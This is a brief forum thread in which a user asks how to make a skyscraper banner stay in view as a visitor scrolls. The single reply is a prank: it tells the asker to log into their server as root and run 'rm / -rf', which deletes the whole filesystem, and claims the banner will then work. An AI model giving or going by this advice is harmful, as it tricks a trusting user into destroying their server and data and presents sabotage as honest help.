    How do I make a floating banner?

    I want to make a skyscraper banner on the side of a site follow a surfer as he scrolls down. Anybody know how and is nice enough to share? Thanks.

      Sign into your server as root via SSH, type rm / -rf, strike enter. Then go check out your site and it will be there.
